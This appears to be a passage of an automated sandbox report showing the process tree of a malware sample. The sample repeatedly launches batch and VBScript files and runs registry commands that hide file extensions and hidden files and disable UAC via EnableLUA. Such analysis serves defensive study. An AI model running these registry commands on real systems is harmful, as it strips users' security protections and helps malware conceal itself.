        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        179⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        176⤵
        Modifies registry key
        
        PID:2288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        176⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        176⤵
        
        PID:2044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        177⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TOEYkAos.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        176⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        177⤵
        
        PID:316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        174⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        174⤵
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        174⤵
        UAC bypass
        
        PID:1556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        175⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSsYcYsg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        174⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        175⤵
        
        PID:368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        172⤵
        
        PID:532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        172⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        172⤵
        UAC bypass
        
        PID:3464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iyIYIwAg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        172⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        173⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        170⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        170⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        170⤵
        
        PID:956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SgMIIkwI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        170⤵
        
        PID:4404
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        171⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        168⤵
        
        PID:820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        168⤵
        
        PID:392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        168⤵
        UAC bypass
        
        PID:2552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ROgUMIcc.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        168⤵
        
        PID:768
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        169⤵
        
        PID:2724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        166⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        166⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        166⤵
        UAC bypass
        
        PID:4324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fekYUMoU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        166⤵
        
        PID:396
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        167⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        164⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        164⤵
        
        PID:368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        165⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        164⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bKUwcggA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        164⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        165⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        162⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        162⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        162⤵
        UAC bypass
        
        PID:4468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nyIgIQwA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        162⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        163⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        160⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        160⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        160⤵
        UAC bypass
        
        PID:3448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SuMIoMYg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        160⤵
        
        PID:464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        161⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        158⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        158⤵
        
        PID:892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        158⤵
        UAC bypass
        
        PID:4180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ecEkYUcw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        158⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        159⤵
        
        PID:820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        156⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        156⤵
        
        PID:4604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        156⤵
        
        PID:3360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        157⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mikMgMMg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        156⤵
        
        PID:4308
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        157⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        154⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3892
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        155⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        154⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        154⤵
        UAC bypass
        
        PID:3856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JukAgQUw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        154⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        155⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        152⤵
        Modifies visibility of file extensions in Explorer
        
        PID:628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        152⤵
        Modifies registry key
        
        PID:1544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        152⤵
        Modifies registry key
        
        PID:3996
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bkUoEscA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        152⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        153⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        150⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        150⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        150⤵
        UAC bypass
        Modifies registry key
        
        PID:3496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\euMMQsgM.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        150⤵
        
        PID:2816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        151⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        151⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        148⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        148⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        148⤵
        Modifies registry key
        
        PID:2424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QCgUwkAI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        148⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        149⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        146⤵
        Modifies registry key
        
        PID:4360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        146⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        146⤵
        UAC bypass
        
        PID:2464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MWYwkgko.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        146⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        147⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        144⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        144⤵
        
        PID:4476
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        145⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        144⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZskUocEI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        144⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        145⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        142⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        142⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        142⤵
        UAC bypass
        Modifies registry key
        
        PID:1936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HAIYAkoI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        142⤵
        
        PID:5052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        143⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        143⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        140⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        140⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        140⤵
        UAC bypass
        
        PID:4712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pisAwoIo.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        140⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        141⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        138⤵
        
        PID:4324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        138⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        138⤵
        UAC bypass
        Modifies registry key
        
        PID:3968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qqUIscUg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        138⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        139⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        136⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        136⤵
        Modifies registry key
        
        PID:4788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        136⤵
        UAC bypass
        
        PID:4288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\meEgEcwU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        136⤵
        
        PID:316
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        137⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        134⤵
        Modifies registry key
        
        PID:2868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        134⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        134⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sGAAYgkc.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        134⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        135⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        132⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        132⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        132⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MEIkkwAM.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        132⤵
        
        PID:2152
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        133⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        130⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        130⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        130⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zwAIkYsY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        130⤵
        
        PID:892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        131⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        128⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2156
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        128⤵
        Modifies registry key
        
        PID:1824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        128⤵
        UAC bypass
        
        PID:3188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rewkMYkg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        128⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\cscript.exe
        
